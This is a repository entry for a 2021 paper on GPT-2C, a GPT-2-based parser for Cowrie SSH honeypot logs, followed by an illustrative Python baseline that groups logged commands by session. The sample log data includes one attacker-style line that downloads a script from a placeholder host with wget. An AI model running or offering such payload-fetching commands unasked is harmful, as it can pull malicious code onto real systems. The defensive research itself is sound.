OuluREPO – Oulun yliopiston julkaisuarkisto / University of Oulu repository

GPT-2C : a parser for honeypot logs using large pre-trained language models

Setianto, Febrian; Tsani, Erion; Sadiq, Fatima; Domalis, Georgios; Tsakalidis, Dimitris; Kostakos, Panos (2022-01-19)

 

URL:
https://doi.org/10.1145/3487351.3492723

Association for Computing Machinery
19.01.2022

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, and Panos Kostakos. 2021. GPT-2C: a parser for honeypot logs using large pre-trained language models. In Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM '21). Association for Computing Machinery, New York, NY, USA, 649–653. DOI:https://doi.org/10.1145/3487351.3492723

https://rightsstatements.org/vocab/InC/1.0/
© 2021 Association for Computing Machinery. This is the author's version of the work. It is posted here for your personal use. Not for redistribution. The definitive Version of Record was published in Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM '21), https://doi.org/10.1145/3487351.3492723.
The permanent address of this publication is
https://urn.fi/URN:NBN:fi-fe2022030221424
Abstract

Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fusing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances in honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.
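
To make the parsing problem concrete, the following is a minimal sketch of a plain rule-based baseline, not the GPT-2C method itself, which relies on a fine-tuned GPT-2 model. It assumes Cowrie's JSON log output, where each line is one event and attacker-typed commands appear as `cowrie.command.input` events with `session` and `input` fields. The function name `extract_commands` and the sample log lines are hypothetical and exist only for illustration.

```python
import json
from collections import defaultdict


def extract_commands(lines):
    """Group attacker-typed commands by session from Cowrie-style JSON log lines.

    Assumption: each line is a JSON object with an "eventid" field, and
    command events carry "session" and "input" fields.
    """
    sessions = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip partial or corrupted lines from a live log
        if not isinstance(event, dict):
            continue  # valid JSON, but not an event object
        if event.get("eventid") == "cowrie.command.input":
            session_id = event.get("session", "unknown")
            sessions[session_id].append(event.get("input", ""))
    return dict(sessions)


# Hypothetical sample lines, invented for this sketch.
sample = [
    '{"eventid": "cowrie.session.connect", "session": "a1", "src_ip": "192.0.2.10"}',
    '{"eventid": "cowrie.command.input", "session": "a1", "input": "uname -a"}',
    '{"eventid": "cowrie.command.input", "session": "a1", "input": "wget http://example.invalid/x.sh"}',
    "not json",
]
commands = extract_commands(sample)
print(commands)
```

A filter like this only works when the log structure is known in advance and stays stable. The abstract's point is that a language model can parse dynamic log output at run time without relying on such fixed rules.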
